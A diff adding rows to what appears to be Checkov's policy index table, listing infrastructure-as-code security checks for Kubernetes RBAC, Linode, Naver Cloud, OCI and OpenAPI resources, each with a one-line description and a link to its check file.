+| 3724 | CKV2_K8S_1               | resource                         | ClusterRole                                                                                      | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding                                                                                                       | Kubernetes              | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml)                                                                                                |
+| 3725 | CKV2_K8S_1               | resource                         | ClusterRoleBinding                                                                               | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding                                                                                                       | Kubernetes              | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml)                                                                                                |
+| 3726 | CKV2_K8S_1               | resource                         | Role                                                                                             | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding                                                                                                       | Kubernetes              | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml)                                                                                                |
+| 3727 | CKV2_K8S_1               | resource                         | RoleBinding                                                                                      | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding                                                                                                       | Kubernetes              | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml)                                                                                                |
+| 3728 | CKV2_K8S_2               | resource                         | ClusterRole                                                                                      | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation                                                                                        | Kubernetes              | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml)                                                                  |
+| 3729 | CKV2_K8S_2               | resource                         | ClusterRoleBinding                                                                               | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation                                                                                        | Kubernetes              | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml)                                                                  |
+| 3730 | CKV2_K8S_2               | resource                         | Role                                                                                             | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation                                                                                        | Kubernetes              | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml)                                                                  |
+| 3731 | CKV2_K8S_2               | resource                         | RoleBinding                                                                                      | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation                                                                                        | Kubernetes              | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml)                                                                  |
+| 3732 | CKV2_K8S_3               | resource                         | ClusterRole                                                                                      | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts                                                                                                           | Kubernetes              | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml)                                                                              |
+| 3733 | CKV2_K8S_3               | resource                         | ClusterRoleBinding                                                                               | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts                                                                                                           | Kubernetes              | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml)                                                                              |
+| 3734 | CKV2_K8S_3               | resource                         | Role                                                                                             | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts                                                                                                           | Kubernetes              | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml)                                                                              |
+| 3735 | CKV2_K8S_3               | resource                         | RoleBinding                                                                                      | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts                                                                                                           | Kubernetes              | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml)                                                                              |
+| 3736 | CKV2_K8S_4               | resource                         | ClusterRole                                                                                      | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster.           | Kubernetes              | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml)                                                                                  |
+| 3737 | CKV2_K8S_4               | resource                         | ClusterRoleBinding                                                                               | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster.           | Kubernetes              | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml)                                                                                  |
+| 3738 | CKV2_K8S_4               | resource                         | Role                                                                                             | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster.           | Kubernetes              | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml)                                                                                  |
+| 3739 | CKV2_K8S_4               | resource                         | RoleBinding                                                                                      | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster.           | Kubernetes              | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml)                                                                                  |
+| 3740 | CKV2_K8S_5               | resource                         | ClusterRole                                                                                      | No ServiceAccount/Node should be able to read all secrets                                                                                                                                                | Kubernetes              | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml)                                                                                              |
+| 3741 | CKV2_K8S_5               | resource                         | ClusterRoleBinding                                                                               | No ServiceAccount/Node should be able to read all secrets                                                                                                                                                | Kubernetes              | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml)                                                                                              |
+| 3742 | CKV2_K8S_5               | resource                         | Role                                                                                             | No ServiceAccount/Node should be able to read all secrets                                                                                                                                                | Kubernetes              | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml)                                                                                              |
+| 3743 | CKV2_K8S_5               | resource                         | RoleBinding                                                                                      | No ServiceAccount/Node should be able to read all secrets                                                                                                                                                | Kubernetes              | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml)                                                                                              |
+| 3744 | CKV2_K8S_6               | resource                         | Deployment                                                                                       | Minimize the admission of pods which lack an associated NetworkPolicy                                                                                                                                    | Kubernetes              | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml)                                                        |
+| 3745 | CKV2_K8S_6               | resource                         | Pod                                                                                              | Minimize the admission of pods which lack an associated NetworkPolicy                                                                                                                                    | Kubernetes              | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml)                                                        |
+| 3746 | CKV_LIN_1                | provider                         | linode                                                                                           | Ensure no hard coded Linode tokens exist in provider                                                                                                                                                     | Terraform               | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py)                                                                                                      |
+| 3747 | CKV_LIN_2                | resource                         | linode_instance                                                                                  | Ensure SSH key set in authorized_keys                                                                                                                                                                    | Terraform               | [authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py)                                                                                              |
+| 3748 | CKV_LIN_3                | resource                         | linode_user                                                                                      | Ensure email is set                                                                                                                                                                                      | Terraform               | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py)                                                                                                |
+| 3749 | CKV_LIN_4                | resource                         | linode_user                                                                                      | Ensure username is set                                                                                                                                                                                   | Terraform               | [user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py)                                                                                          |
+| 3750 | CKV_LIN_5                | resource                         | linode_firewall                                                                                  | Ensure Inbound Firewall Policy is not set to ACCEPT                                                                                                                                                      | Terraform               | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py)                                                                              |
+| 3751 | CKV_LIN_6                | resource                         | linode_firewall                                                                                  | Ensure Outbound Firewall Policy is not set to ACCEPT                                                                                                                                                     | Terraform               | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py)                                                                            |
+| 3752 | CKV_NCP_1                | resource                         | ncloud_lb_target_group                                                                           | Ensure HTTP HTTPS Target group defines Healthcheck                                                                                                                                                       | Terraform               | [LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py)                                                                 |
+| 3753 | CKV_NCP_2                | resource                         | ncloud_access_control_group                                                                      | Ensure every access control groups rule has a description                                                                                                                                                | Terraform               | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py)                                                             |
+| 3754 | CKV_NCP_2                | resource                         | ncloud_access_control_group_rule                                                                 | Ensure every access control groups rule has a description                                                                                                                                                | Terraform               | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py)                                                             |
+| 3755 | CKV_NCP_3                | resource                         | ncloud_access_control_group_rule                                                                 | Ensure no security group rules allow outbound traffic to 0.0.0.0/0                                                                                                                                       | Terraform               | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py)                                                                   |
+| 3756 | CKV_NCP_4                | resource                         | ncloud_access_control_group_rule                                                                 | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 22                                                                                                                                  | Terraform               | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py)                                                         |
+| 3757 | CKV_NCP_5                | resource                         | ncloud_access_control_group_rule                                                                 | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389                                                                                                                                | Terraform               | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py)                                                     |
+| 3758 | CKV_NCP_6                | resource                         | ncloud_server                                                                                    | Ensure Server instance is encrypted.                                                                                                                                                                     | Terraform               | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py)                                                                                         |
+| 3759 | CKV_NCP_7                | resource                         | ncloud_launch_configuration                                                                      | Ensure Basic Block storage is encrypted.                                                                                                                                                                 | Terraform               | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py)                                                               |
+| 3760 | CKV_NCP_8                | resource                         | ncloud_network_acl_rule                                                                          | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20                                                                                                                                                   | Terraform               | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py)                                                                                                     |
+| 3761 | CKV_NCP_9                | resource                         | ncloud_network_acl_rule                                                                          | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21                                                                                                                                                   | Terraform               | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py)                                                                                                     |
+| 3762 | CKV_NCP_10               | resource                         | ncloud_network_acl_rule                                                                          | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22                                                                                                                                                   | Terraform               | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py)                                                                                                     |
+| 3763 | CKV_NCP_11               | resource                         | ncloud_network_acl_rule                                                                          | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389                                                                                                                                                 | Terraform               | [NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py)                                                                                                 |
+| 3764 | CKV_NCP_12               | resource                         | ncloud_network_acl_rule                                                                          | An inbound Network ACL rule should not allow ALL ports.                                                                                                                                                  | Terraform               | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py)                                                                                                     |
+| 3765 | CKV_NCP_13               | resource                         | ncloud_lb_listener                                                                               | Ensure LB Listener uses only secure protocols                                                                                                                                                            | Terraform               | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py)                                                                     |
+| 3766 | CKV_NCP_14               | resource                         | ncloud_nas_volume                                                                                | Ensure NAS is securely encrypted                                                                                                                                                                         | Terraform               | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py)                                                                                       |
+| 3767 | CKV_NCP_15               | resource                         | ncloud_lb_target_group                                                                           | Ensure Load Balancer Target Group is not using HTTP                                                                                                                                                      | Terraform               | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py)                                                                                 |
+| 3768 | CKV_NCP_16               | resource                         | ncloud_lb                                                                                        | Ensure Load Balancer isn't exposed to the internet                                                                                                                                                       | Terraform               | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py)                                                                                               |
+| 3769 | CKV_NCP_18               | resource                         | ncloud_auto_scaling_group                                                                        | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks.                                                                                        | Terraform               | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml)                                                                               |
+| 3770 | CKV_NCP_18               | resource                         | ncloud_lb_target_group                                                                           | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks.                                                                                        | Terraform               | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml)                                                                               |
+| 3771 | CKV_NCP_19               | resource                         | ncloud_nks_cluster                                                                               | Ensure Naver Kubernetes Service public endpoint disabled                                                                                                                                                 | Terraform               | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py)                                                                                                 |
+| 3772 | CKV_NCP_20               | resource                         | ncloud_route                                                                                     | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity                                                                                    | Terraform               | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py)                                                                         |
+| 3773 | CKV_NCP_22               | resource                         | ncloud_nks_cluster                                                                               | Ensure NKS control plane logging enabled for all log types                                                                                                                                               | Terraform               | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py)                                                                                   |
+| 3774 | CKV_NCP_22               | resource                         | ncloud_route_table                                                                               | Ensure a route table for the public subnets is created.                                                                                                                                                  | Terraform               | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml)                                                       |
+| 3775 | CKV_NCP_22               | resource                         | ncloud_subnet                                                                                    | Ensure a route table for the public subnets is created.                                                                                                                                                  | Terraform               | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml)                                                       |
+| 3776 | CKV_NCP_23               | resource                         | ncloud_public_ip                                                                                 | Ensure Server instance should not have public IP.                                                                                                                                                        | Terraform               | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py)                                                                                                   |
+| 3777 | CKV_NCP_24               | resource                         | ncloud_lb_listener                                                                               | Ensure Load Balancer Listener Using HTTPS                                                                                                                                                                | Terraform               | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py)                                                                                       |
+| 3778 | CKV_NCP_25               | resource                         | ncloud_access_control_group_rule                                                                 | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80                                                                                                                                  | Terraform               | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py)                                                         |
+| 3779 | CKV_NCP_26               | resource                         | ncloud_access_control_group                                                                      | Ensure Access Control Group has Access Control Group Rule attached                                                                                                                                       | Terraform               | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml)                                                               |
+| 3780 | CKV_OCI_1                | provider                         | oci                                                                                              | Ensure no hard coded OCI private key in provider                                                                                                                                                         | Terraform               | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py)                                                                                                         |
+| 3781 | CKV_OCI_2                | resource                         | oci_core_volume                                                                                  | Ensure OCI Block Storage Block Volume has backup enabled                                                                                                                                                 | Terraform               | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py)                                                                             |
+| 3782 | CKV_OCI_3                | resource                         | oci_core_volume                                                                                  | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK)                                                                                                                      | Terraform               | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py)                                                                                   |
+| 3783 | CKV_OCI_4                | resource                         | oci_core_instance                                                                                | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled                                                                                                                           | Terraform               | [InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py)                                                     |
+| 3784 | CKV_OCI_5                | resource                         | oci_core_instance                                                                                | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled                                                                                                                                | Terraform               | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py)                                                                   |
+| 3785 | CKV_OCI_6                | resource                         | oci_core_instance                                                                                | Ensure OCI Compute Instance has monitoring enabled                                                                                                                                                       | Terraform               | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py)                                                                             |
+| 3786 | CKV_OCI_7                | resource                         | oci_objectstorage_bucket                                                                         | Ensure OCI Object Storage bucket can emit object events                                                                                                                                                  | Terraform               | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py)                                                                                 |
+| 3787 | CKV_OCI_8                | resource                         | oci_objectstorage_bucket                                                                         | Ensure OCI Object Storage has versioning enabled                                                                                                                                                         | Terraform               | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py)                                                                                 |
+| 3788 | CKV_OCI_9                | resource                         | oci_objectstorage_bucket                                                                         | Ensure OCI Object Storage is encrypted with Customer Managed Key                                                                                                                                         | Terraform               | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py)                                                                                 |
+| 3789 | CKV_OCI_10               | resource                         | oci_objectstorage_bucket                                                                         | Ensure OCI Object Storage is not Public                                                                                                                                                                  | Terraform               | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py)                                                                                         |
+| 3790 | CKV_OCI_11               | resource                         | oci_identity_authentication_policy                                                               | OCI IAM password policy - must contain lower case                                                                                                                                                        | Terraform               | [IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py)                                                                           |
+| 3791 | CKV_OCI_12               | resource                         | oci_identity_authentication_policy                                                               | OCI IAM password policy - must contain Numeric characters                                                                                                                                                | Terraform               | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py)                                                                               |
+| 3792 | CKV_OCI_13               | resource                         | oci_identity_authentication_policy                                                               | OCI IAM password policy - must contain Special characters                                                                                                                                                | Terraform               | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py)                                                           |
+| 3793 | CKV_OCI_14               | resource                         | oci_identity_authentication_policy                                                               | OCI IAM password policy - must contain Uppercase characters                                                                                                                                              | Terraform               | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py)                                                                           |
+| 3794 | CKV_OCI_15               | resource                         | oci_file_storage_file_system                                                                     | Ensure OCI File System is Encrypted with a customer Managed Key                                                                                                                                          | Terraform               | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py)                                                                                       |
+| 3795 | CKV_OCI_16               | resource                         | oci_core_security_list                                                                           | Ensure VCN has an inbound security list                                                                                                                                                                  | Terraform               | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py)                                                                                         |
+| 3796 | CKV_OCI_17               | resource                         | oci_core_security_list                                                                           | Ensure VCN inbound security lists are stateless                                                                                                                                                          | Terraform               | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py)                                                                       |
+| 3797 | CKV_OCI_18               | resource                         | oci_identity_authentication_policy                                                               | OCI IAM password policy for local (non-federated) users has a minimum length of 14 characters                                                                                                            | Terraform               | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py)                                                                                             |
+| 3798 | CKV_OCI_19               | resource                         | oci_core_security_list                                                                           | Ensure no security list allow ingress from 0.0.0.0:0 to port 22.                                                                                                                                         | Terraform               | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py)                                                             |
+| 3799 | CKV_OCI_20               | resource                         | oci_core_security_list                                                                           | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389.                                                                                                                                       | Terraform               | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py)                                                         |
+| 3800 | CKV_OCI_21               | resource                         | oci_core_network_security_group_security_rule                                                    | Ensure security group has stateless ingress security rules                                                                                                                                               | Terraform               | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py)                                         |
+| 3801 | CKV_OCI_22               | resource                         | oci_core_network_security_group_security_rule                                                    | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22                                                                                                                                  | Terraform               | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py)                                                         |
+| 3802 | CKV2_OCI_1               | resource                         | oci_identity_group                                                                               | Ensure administrator users are not associated with API keys                                                                                                                                              | Terraform               | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml)                                       |
+| 3803 | CKV2_OCI_1               | resource                         | oci_identity_user                                                                                | Ensure administrator users are not associated with API keys                                                                                                                                              | Terraform               | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml)                                       |
+| 3804 | CKV2_OCI_1               | resource                         | oci_identity_user_group_membership                                                               | Ensure administrator users are not associated with API keys                                                                                                                                              | Terraform               | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml)                                       |
+| 3805 | CKV2_OCI_2               | resource                         | oci_core_network_security_group_security_rule                                                    | Ensure NSG does not allow all traffic on RDP port (3389)                                                                                                                                                 | Terraform               | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml)                                                                                   |
+| 3806 | CKV2_OCI_3               | resource                         | oci_containerengine_cluster                                                                      | Ensure Kubernetes engine cluster is configured with NSG(s)                                                                                                                                               | Terraform               | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml)                       |
+| 3807 | CKV2_OCI_4               | resource                         | oci_file_storage_export                                                                          | Ensure File Storage File System access is restricted to root users                                                                                                                                       | Terraform               | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml)                                                   |
+| 3808 | CKV2_OCI_5               | resource                         | oci_containerengine_node_pool                                                                    | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption                                                                                                               | Terraform               | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml)                 |
+| 3809 | CKV2_OCI_6               | resource                         | oci_containerengine_cluster                                                                      | Ensure Kubernetes Engine Cluster pod security policy is enforced                                                                                                                                         | Terraform               | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml)                                         |
+| 3810 | CKV_OPENAPI_1            | resource                         | securityDefinitions                                                                              | Ensure that securityDefinitions is defined and not empty - version 2.0 files                                                                                                                             | OpenAPI                 | [SecurityDefinitions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitions.py)                                                                                            |
+| 3811 | CKV_OPENAPI_2            | resource                         | security                                                                                         | Ensure that if the security scheme is not of type 'oauth2', the array value must be empty - version 2.0 files                                                                                            | OpenAPI                 | [Oauth2SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityRequirement.py)                                                                                |
+| 3812 | CKV_OPENAPI_3            | resource                         | components                                                                                       | Ensure that security schemes don't allow cleartext credentials over unencrypted channel - version 3.x.y files                                                                                            | OpenAPI                 | [CleartextOverUnencryptedChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py)                                                                    |
+| 3813 | CKV_OPENAPI_4            | resource                         | security                                                                                         | Ensure that the global security field has rules defined                                                                                                                                                  | OpenAPI                 | [GlobalSecurityFieldIsEmpty.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/GlobalSecurityFieldIsEmpty.py)                                                                         |
+| 3814 | CKV_OPENAPI_5            | resource                         | security                                                                                         | Ensure that security operations is not empty.                                                                                                                                                            | OpenAPI                 | [SecurityOperations.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/SecurityOperations.py)                                                                                         |
